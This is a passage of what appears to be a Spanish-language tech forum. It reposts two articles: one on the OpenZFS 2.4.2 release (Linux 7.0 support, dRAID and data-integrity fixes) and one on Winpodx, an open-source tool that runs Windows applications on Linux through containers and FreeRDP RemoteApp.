• Entornos empresariales
• Plataformas cloud privadas
• Sistemas NAS avanzados
• Infraestructura de virtualización

La posibilidad de utilizar una misma versión de OpenZFS sobre múltiples generaciones de kernels simplifica considerablemente la gestión operativa y reduce la complejidad durante ciclos de actualización.

El problema de compatibilidad con Linux 7.0

El soporte oficial para Linux 7.0 no es únicamente un cambio administrativo o de documentación.

Antes de OpenZFS 2.4.2, algunos sistemas que ejecutaban kernels Linux 7.0 junto con OpenZFS 2.4.1 mostraban advertencias relacionadas con compatibilidad experimental y posibles riesgos de corrupción de datos.

Esto comenzó a observarse especialmente en versiones preliminares de distribuciones basadas en Ubuntu y otros entornos Linux modernos.

Aunque muchos sistemas parecían funcionar correctamente, el uso de combinaciones no certificadas en entornos de almacenamiento críticos representaba un riesgo importante.

Con OpenZFS 2.4.2, el proyecto elimina oficialmente esa incertidumbre y declara soporte completo para Linux 7.0, ofreciendo un escenario mucho más seguro para organizaciones que necesitan avanzar rápidamente en actualizaciones de kernel sin comprometer la estabilidad de sus pools ZFS.

OpenZFS también prepara compatibilidad con Linux 7.1

Además del soporte actual para Linux 7.0, el proyecto ya comenzó a implementar ajustes preliminares orientados a Linux 7.1.

Aunque todavía no se considera una compatibilidad plenamente cerrada, estos cambios buscan anticipar modificaciones internas del kernel que podrían afectar el funcionamiento de módulos externos como OpenZFS.

Este enfoque preventivo es especialmente importante porque:

• Reduce incompatibilidades futuras
• Minimiza interrupciones en actualizaciones
• Facilita despliegues tempranos
• Mejora la transición entre versiones

La estrategia demuestra además el enfoque proactivo del proyecto para mantener alineada la evolución del sistema de archivos con el rápido desarrollo del ecosistema Linux.

Compatibilidad mantenida con FreeBSD 13 y 14

En el entorno BSD, OpenZFS 2.4.2 continúa ofreciendo soporte estable para:

• FreeBSD 13.3
• FreeBSD 14.x
• Versiones posteriores compatibles

Esto garantiza continuidad para organizaciones que utilizan infraestructuras mixtas Linux y FreeBSD en tareas de:

• Almacenamiento empresarial
• Backups
• Virtualización
• Sistemas NAS
• Clústeres de alta disponibilidad

La estabilidad multiplataforma sigue siendo uno de los puntos más fuertes del ecosistema OpenZFS frente a otras soluciones de almacenamiento.

Correcciones críticas para integridad de datos

Más allá del soporte de kernel, la actualización incorpora numerosas correcciones internas enfocadas en integridad de datos y fiabilidad operativa.

Aunque muchos de estos errores aparecían únicamente en escenarios poco frecuentes, son precisamente este tipo de fallos los que más preocupan en infraestructuras críticas de almacenamiento.

Entre las correcciones más importantes destacan:

Solución de errores de checksum

La nueva versión corrige problemas raros de checksum que podían aparecer después de procesos complejos de reconstrucción de datos.

Este tipo de errores es especialmente delicado en:

• Grandes pools ZFS
• Infraestructuras RAID
• Sistemas degradados
• Reemplazo de discos
• Mejoras importantes para dRAID

Uno de los apartados más beneficiados en OpenZFS 2.4.2 es dRAID.

El proyecto solucionó varios problemas relacionados con reconstrucciones posteriores a fallos de unidades deterioradas.

Esto mejora considerablemente la fiabilidad en despliegues empresariales que utilizan:

• Pools masivos
• Almacenamiento distribuido
• Infraestructura de backup
• Sistemas de alta disponibilidad

dRAID se ha convertido en una tecnología cada vez más relevante dentro de OpenZFS por su capacidad para optimizar reconstrucciones y mejorar resiliencia frente a fallos de hardware.

Correcciones durante importación de pools

La actualización también introduce mejoras en procesos de importación de pools después de reemplazos de discos.

En versiones anteriores podían producirse escenarios complejos donde:

• El pool no se importaba correctamente
• Se generaban inconsistencias
• Existían condiciones de carrera internas

Estos problemas, aunque poco frecuentes, representan riesgos importantes en infraestructuras críticas donde la disponibilidad del almacenamiento es esencial.

Solución de race conditions y errores UAF

OpenZFS 2.4.2 corrige además:

• Race conditions en range trees
• Problemas use-after-free (UAF)
• Errores internos en dmu_write_direct_done

Los fallos UAF son especialmente peligrosos porque pueden derivar en:

• Corrupción de memoria
• Comportamientos impredecibles
• Fallos del sistema
• Riesgos de estabilidad

La corrección de este tipo de errores refuerza considerablemente la robustez general del sistema de archivos.

Corrección de corrupción tras block cloning

Otro de los problemas solucionados afecta operaciones relacionadas con:

• Block cloning
• Truncado de archivos
• Lecturas posteriores

En determinadas circunstancias poco comunes, podían producirse corrupciones silenciosas de lectura después de ciertas operaciones complejas.

Este tipo de errores son especialmente críticos porque pueden pasar desapercibidos durante largos periodos hasta que los datos afectados necesitan recuperarse.

La corrección reduce significativamente riesgos en entornos donde se utilizan intensivamente:

• Snapshots
• Clones
• Replicación
• Deduplicación

Una actualización silenciosa pero clave para administradores

Aunque OpenZFS 2.4.2 no introduce funciones mediáticas ni grandes cambios visibles para usuarios domésticos, se trata de una actualización extremadamente importante para administradores de almacenamiento y entornos empresariales.

La combinación de:

• Compatibilidad oficial con Linux 7.0
• Mejoras en dRAID
• Correcciones de corrupción
• Mayor estabilidad interna
• Mejor interoperabilidad Linux/FreeBSD

convierte este lanzamiento en una actualización altamente recomendable para infraestructuras críticas.

En muchos casos, las versiones más valiosas de un sistema de archivos no son aquellas que añaden funciones llamativas, sino las que reducen silenciosamente el riesgo de pérdida de datos y aumentan la previsibilidad operativa.

OpenZFS sigue consolidándose como referencia en almacenamiento open source

El ecosistema de OpenZFS continúa consolidándose como una de las soluciones más robustas para almacenamiento empresarial open source.

Gracias a características avanzadas como:

• Snapshots
• Checksums end-to-end
• RAID-Z
• dRAID
• Compresión
• Clonación de bloques
• Replicación
• Pools escalables

OpenZFS sigue siendo una referencia para organizaciones que necesitan alta integridad de datos y máxima resiliencia frente a fallos.

Con la llegada de OpenZFS 2.4.2, el proyecto demuestra nuevamente su enfoque centrado en estabilidad, fiabilidad y compatibilidad a largo plazo, factores fundamentales para cualquier infraestructura moderna de almacenamiento profesional.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Durante años, ejecutar aplicaciones de Windows en Linux ha sido uno de los mayores desafíos para usuarios avanzados, desarrolladores y entornos empresariales. Aunque herramientas como Wine, CrossOver o las máquinas virtuales tradicionales han intentado resolver el problema, la realidad es que muchas soluciones terminan generando incompatibilidades, consumo excesivo de recursos o configuraciones complejas difíciles de mantener.

En este contexto aparece Winpodx, un proyecto de código abierto que está captando la atención de la comunidad Linux por ofrecer una propuesta diferente: ejecutar aplicaciones de Windows dentro de Linux como si fueran aplicaciones nativas del sistema.

La iniciativa apuesta por una integración profunda con el escritorio Linux utilizando contenedores, RemoteApp y automatización avanzada, eliminando gran parte de la fricción que históricamente ha existido entre ambos ecosistemas.

¿Qué es Winpodx?

Winpodx es un proyecto open source publicado bajo licencia MIT y desarrollado por kernalix7. Su objetivo principal es permitir que aplicaciones de Windows se ejecuten en Linux con el máximo nivel de integración posible y sin depender de máquinas virtuales pesadas o capas de compatibilidad inestables.

A diferencia de herramientas como Wine, Winpodx no intenta traducir llamadas de la API de Windows hacia Linux. En su lugar, ejecuta un entorno Windows real dentro de un contenedor optimizado y únicamente expone las ventanas individuales de las aplicaciones al escritorio Linux.

Esto permite que programas como:

• Microsoft Word
• Visual Studio
• Photoshop
• SQL Server Management Studio
• Notepad++
• Aplicaciones corporativas empresariales

aparezcan directamente en el menú de aplicaciones de Linux como si fueran software nativo.

Cómo funciona Winpodx internamente

La arquitectura de Winpodx está diseñada alrededor de tres pilares fundamentales:

• Contenedores Windows basados en Docker o Podman
• FreeRDP RemoteApp (RAIL)
• Herramientas de gestión CLI y GUI Qt6

La combinación de estas tecnologías crea una experiencia extremadamente integrada entre Windows y Linux.

Contenedores Windows en lugar de máquinas virtuales

Uno de los mayores diferenciales de Winpodx es que utiliza contenedores en lugar de máquinas virtuales completas.

El proyecto se basa en la imagen dockur/windows para desplegar una instalación optimizada de Windows dentro de un contenedor Docker o Podman.

Durante el proceso de despliegue se automatizan múltiples tareas:

• Descarga de ISO oficial de Microsoft
• Ejecución de Sysprep
• Aplicación de ajustes OEM
• Eliminación de telemetría y servicios innecesarios
• Optimización de rendimiento

Este enfoque reduce considerablemente el consumo de recursos frente a soluciones tradicionales como VirtualBox o VMware.

Además, el contenedor puede ser gestionado como cualquier otro servicio moderno dentro de infraestructuras DevOps y entornos empresariales.

FreeRDP RemoteApp: apps Windows como ventanas nativas

El componente más llamativo de Winpodx es el uso de FreeRDP con soporte RemoteApp (RAIL).

En lugar de mostrar un escritorio remoto completo de Windows, Winpodx únicamente proyecta las ventanas individuales de las aplicaciones.

Esto significa que el usuario puede:

• Abrir Word desde GNOME o KDE
• Usar Photoshop como ventana independiente
• Asociar archivos .docx o .xlsx
• Ver iconos reales en el menú Linux
• Gestionar ventanas normalmente

Desde el punto de vista visual, las aplicaciones se comportan como software nativo Linux.

Además, Winpodx integra:

• Audio bidireccional
• Portapapeles compartido
• Impresoras Linux
• Carpetas compartidas
• Unidades USB automáticas

Todo ello sin necesidad de configuraciones manuales complejas.

Compatibilidad superior frente a Wine

Las soluciones basadas en Wine y CrossOver ofrecen una capa de compatibilidad relativamente ligera, pero frecuentemente presentan problemas con aplicaciones modernas o corporativas.

Muchos programas dependen de APIs específicas de Windows que Wine no implementa correctamente.

Winpodx evita ese problema ejecutando un Windows real dentro del contenedor. Como consecuencia:

• La compatibilidad es mucho más alta
• Las aplicaciones funcionan como en Windows original
• Se reducen errores inesperados
• Mejora la estabilidad empresarial

Esto resulta especialmente útil para:

• Equipos de desarrollo
• Administradores de sistemas
• Empresas híbridas Linux/Windows
• Profesionales técnicos
• Usuarios avanzados

Multi-sesión RDP gracias a rdprrap

Uno de los componentes técnicos más interesantes del proyecto es rdprrap, una reimplementación moderna en Rust de RDPWrap.

El sistema elimina el límite tradicional de una sola sesión RDP simultánea en Windows Desktop y permite hasta 10 sesiones independientes.

Gracias a esto, múltiples aplicaciones pueden ejecutarse en paralelo sin interferir entre sí.

El componente incluye:

• Verificación SHA256
• Instalación automatizada
• Código auditable
• Licencia MIT

Esto aporta mayor transparencia y seguridad frente a binarios cerrados o proyectos abandonados.

Seguridad y automatización avanzada

Winpodx incorpora múltiples funciones orientadas a seguridad y administración empresarial.

Entre las más importantes destacan:

Rotación automática de contraseñas

El sistema genera nuevas contraseñas cada 7 días utilizando generación criptográficamente segura.

Además, implementa mecanismos de reversión automática en caso de error para evitar bloqueos administrativos.

Suspensión automática del contenedor

Cuando ninguna aplicación Windows está en uso, el contenedor se suspende automáticamente.

Esto reduce considerablemente:

• Consumo de RAM
• Uso de CPU
• Impacto energético
• Recursos del sistema

El contenedor vuelve a activarse automáticamente cuando se inicia una nueva aplicación.

Health checks integrados

El comando winpodx check permite verificar:

• Estado del contenedor
• Servicio RDP
• Espacio en disco
• Agente HTTP interno
• Estado de autenticación

Esto facilita la administración en entornos profesionales.

Reverse-open: Linux y Windows trabajando en ambos sentidos

Desde la versión 0.5.0, Winpodx incluye una característica llamada reverse-open.

La función permite abrir aplicaciones Linux directamente desde el entorno Windows contenerizado.

Por ejemplo:

• Abrir archivos .txt con Kate
• Editar Markdown con herramientas Linux
• Utilizar apps host desde Windows

Esto convierte la integración en un flujo bidireccional muy natural.

El sistema utiliza:

• Agentes HTTP autenticados
• Tokens bearer
• Comunicación JSON
• Shims escritos en Rust

Todo diseñado para mantener integración fluida y segura.

Distribuciones Linux compatibles

Actualmente Winpodx ofrece soporte para múltiples distribuciones Linux, incluyendo:

• Debian
• Ubuntu
• Fedora
• openSUSE
• Arch Linux
• Manjaro
• AlmaLinux
• Rocky Linux
• RHEL
• NixOS

El proyecto proporciona instalación mediante:

• apt
• dnf
• zypper
• pacman
• AUR
• flakes Nix

Además, dispone de documentación extensa sobre:

• Arquitectura
• Instalación offline
• Seguridad
• GUI
• CLI
• Contribución
• Comparativas técnicas

Integración profunda con el escritorio Linux

Uno de los puntos más sólidos de Winpodx es el descubrimiento automático de aplicaciones.

El sistema escanea:

• Registry App Paths
• Menú Inicio
• Aplicaciones UWP/MSIX
• Chocolatey
• Scoop

Posteriormente genera archivos .desktop compatibles con Linux.

Esto permite:

• Agrupación correcta en docks
• Asociación automática de archivos
• Iconos reales
• Integración visual coherente

Por ejemplo, un archivo .docx puede abrirse directamente con Word desde el explorador Linux.

Limitaciones actuales de Winpodx

Aunque el proyecto es extremadamente prometedor, todavía presenta algunas limitaciones importantes.

GPU passthrough limitado

Actualmente no está orientado a:

• Gaming moderno
• Renderizado 3D intensivo
• Edición de vídeo 4K profesional

La aceleración GPU avanzada requiere configuraciones manuales mediante VFIO o KVM.

Dependencia de licencias Windows

Aunque Winpodx sea gratuito y open source, sigue siendo necesario disponer de licencias válidas de Windows.

El contenedor ejecuta una instalación real del sistema operativo de Microsoft, por lo que aplican las condiciones de licenciamiento habituales.

Proyecto todavía joven

El ecosistema aún está madurando y no ofrece soporte empresarial oficial ni SLA garantizados.

Esto puede ser un factor importante para organizaciones altamente reguladas o infraestructuras críticas.

¿Es Winpodx el futuro de las apps Windows en Linux?

El enfoque de Winpodx representa una evolución interesante frente a las soluciones tradicionales.

Al combinar:

• Compatibilidad casi total
• Integración visual avanzada
• Automatización moderna
• Contenedores ligeros
• Arquitectura open source

el proyecto consigue acercarse a una experiencia híbrida mucho más natural entre Linux y Windows.

Para desarrolladores, profesionales técnicos y usuarios avanzados que dependen de aplicaciones Windows pero prefieren trabajar en Linux, Winpodx podría convertirse en una de las herramientas más relevantes del ecosistema durante los próximos años.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login